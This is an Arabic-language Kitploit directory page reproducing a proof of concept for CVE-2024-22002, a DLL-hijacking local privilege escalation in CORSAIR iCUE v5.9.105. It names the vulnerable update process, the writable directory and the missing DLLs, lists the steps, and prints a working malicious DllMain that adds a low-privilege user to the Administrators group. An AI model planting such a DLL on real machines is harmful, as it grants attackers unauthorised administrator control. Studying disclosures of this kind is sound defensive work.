Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
iCUE_DllHijack_LPE-CVE-2024-22002 — دليل على المفهوم لثغرة تصعيد الامتيازات المحلية (CVE-2024-22002) في CORSAIR iCUE الإصدار v5.9.105 عبر اختطاف DLL أثناء عملية التحديث، مما يمكّن المستخدمين غير المصرح لهم من الحصول على امتيازات SYSTEM. | Kitploit
أدوات/GitHubGitHub/0xkickit/icue_dllhijack_lpe-cve-2024-22002
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHub0xkickit/icue_dllhijack_lpe-cve-2024-22002

iCUE_DllHijack_LPE-CVE-2024-22002

دليل على المفهوم لثغرة تصعيد الامتيازات المحلية (CVE-2024-22002) في CORSAIR iCUE الإصدار v5.9.105 عبر اختطاف DLL أثناء عملية التحديث، مما يمكّن المستخدمين غير المصرح لهم من الحصول على امتيازات SYSTEM.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

البرنامج الضعيف والإصدار

  • رابط تحميل البرنامج: CORSAIR iCUE v5.9.105 with iCUE Murals

الوصف

تم اكتشاف ثغرة اختطاف DLL (DLL Hijacking) في iCUE v5.9.105. تحدث هذه الثغرة أثناء عملية التحديث التي تديرها خدمة "iCUEUpdateService". تقوم الخدمة بإطلاق عملية ("cuepkg.exe") مسؤولة عن تنفيذ التحديث، وتعمل بصلاحيات "NT AUTHORITY\SYSTEM". عند بدء العملية، تبحث عن العديد من ملفات DLL في الدليل \cuepkg-1.2.6 الموجود داخل دليل تثبيت iCUE. بعض هذه الملفات غير موجودة افتراضيًا، ولكن نظرًا لأن المستخدم العادي لديه صلاحيات لإنشاء ملفات في هذا الدليل، يمكن للمهاجم إدخال ملف DLL ضار إلى الدليل. وبالتالي، سيتم تحميل ملف DLL الضار بواسطة cuepkg.exe بصلاحيات مدير (Administrator).

ملفات DLL المتأثرة التي تم اكتشافها هي:

  • MSASN1.dll
  • NTASN1.dll
  • profapi.dll

متجه CVSS: (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

  • Base Score: 7.8 (عالية)
  • Temporal Score: 7.8 (عالية)
  • Environmental Score: 7.8 (عالية)

PoC

كمثال، سيتم استخدام ملف DLL profapi.dll.

  1. قم بإنشاء ملف DLL الضار الخاص بنا وأضفه إلى الدليل %INSTALLDIR%cuepkg-1.2.6.
  2. انتظر حتى يتم تحديث البرنامج تلقائيًا، أو في هذه الحالة، قم بفرض التحديث بالنقر على "Check for updates".
  3. يتم إضافة المستخدم الذي لا يمتلك صلاحيات المسؤول إلى المجموعة.

صلاحيات المستخدم lowpriv قبل تنفيذ ملف DLL الضار: lowpriv_cmd

صلاحيات المستخدم lowpriv بعد تنفيذ ملف DLL الضار: lowpriv_cmd_adm

  • مثال على الكود الضار:
root@kitploit:~
#include "pch.h"
#include <windows.h>
#include <cstdlib>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    {
        system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
    }
    break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }

    return TRUE;
}
تنزيل الأداة